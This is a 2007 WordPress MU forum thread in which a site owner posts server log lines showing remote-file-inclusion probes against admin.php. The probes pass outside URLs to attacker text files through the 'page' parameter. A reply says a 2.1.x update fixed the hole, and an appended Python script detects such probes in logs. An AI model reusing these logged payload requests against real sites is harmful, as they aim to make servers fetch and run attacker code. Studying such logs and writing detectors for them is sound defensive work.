WP/WPMU admin.php expl0it of somekind? (2 posts)

  1. xiand0
    Blocked
    Posted 16 years ago #

    I get a whole lot of these in my logs right now - from numerous different IP addresses.

    213.195.77.225 - - [16/Aug/2007:13:58:19 -0400] "GET /2007/07/23/4/admin.php?page=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
    213.195.77.225 - - [16/Aug/2007:13:58:19 -0400] "GET /admin.php?page=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
    213.195.77.225 - - [16/Aug/2007:13:58:20 -0400] "GET /2007/07/23/admin.php?page=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
    213.195.77.225 - - [16/Aug/2007:13:58:20 -0400] "GET /2007/07/23/4/admin.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
    213.195.77.225 - - [16/Aug/2007:13:58:20 -0400] "GET /admin.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"
    213.195.77.225 - - [16/Aug/2007:13:58:21 -0400] "GET /2007/07/23/admin.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"

    Now, it must be mentioned that WPMU 1.2.4 does not comply with loading those external ?page= URLs and these "hacking" attempts (or whatever you call it) are just a waste of CPU/BW and annoying, not dangerous.

    But I thought I'd mention this anyway, since - and note that this is guesswork - this MAY be some exploit which works on some old(?) WP or WPMU version. I don't know. But it may be a good idea to check if your WPMU will load admin.php?page=http://external.tld/somepage URLs and it'd be nice to clarify if there is any version of WP/WPMU where this actually works. This does not seem to work on my WPMU 1.2.4, but it does seem apparent that it works on SOME WP/WPMU version since these f**kheads keep on scanning to see if it works.

  2. drmiketemp
    Member
    Posted 16 years ago #

    I can't find it right off, but it was one of the last security problems WordPress had. It was fixed in one of the 2.1.x upgrades though.
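A log-triage sketch for the probing pattern shown in the first post, added here as an example and not part of the original thread: it scans Apache combined-format lines for any query parameter (not only `page`) whose value is an absolute URL, groups hits by client IP, and counts how many were not refused. The sample lines, IP addresses and hostnames are constructed, and the names `find_rfi_probes` and `_host` are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: client IP, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself an absolute URL is the probe signature.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges and example domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Aug/2007:13:58:19 -0400] "GET /admin.php?page=http://files.example.net/a.txt? HTTP/1.1" 403 957 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [16/Aug/2007:13:58:20 -0400] "GET /2007/07/23/admin.php?page=http%3A%2F%2Fhost.example.org%2Fb.txt%3F HTTP/1.1" 403 957 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [16/Aug/2007:14:02:11 -0400] "GET /wp-admin/admin.php?page=stats HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [16/Aug/2007:14:05:42 -0400] "GET /blog/admin.php?page=HTTP://files.example.net/c.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"',
]

def _host(url):
    """Hostname of a URL, or None if it cannot be parsed."""
    try:
        return urlsplit(url).hostname
    except ValueError:  # e.g. malformed IPv6 literal in hostile input
        return None

def find_rfi_probes(lines):
    """Group requests carrying a URL-valued query parameter by client IP."""
    report = defaultdict(lambda: {"hits": 0, "served": 0, "remote_hosts": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        # parse_qsl percent-decodes, so page=http%3A%2F%2F... is caught too.
        query = m["target"].partition("?")[2]
        values = [v.strip() for _, v in parse_qsl(query, keep_blank_values=True)]
        urls = [v for v in values if REMOTE_RE.match(v)]
        if not urls:
            continue
        entry = report[m["ip"]]
        entry["hits"] += 1
        # A status below 400 means the server did not refuse the request.
        entry["served"] += int(m["status"]) < 400
        entry["remote_hosts"] |= {_host(u) for u in urls} - {None}
    return dict(report)

if __name__ == "__main__":
    for ip, e in find_rfi_probes(SAMPLE_LOG).items():
        print(ip, e["hits"], "probes,", e["served"], "not refused,", sorted(e["remote_hosts"]))
```

A non-zero "not refused" count only says the server answered instead of rejecting; whether the application actually fetched the remote URL has to be checked on the host itself.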

About this Topic

  • Started 16 years ago by xiand0
  • Latest reply from drmiketemp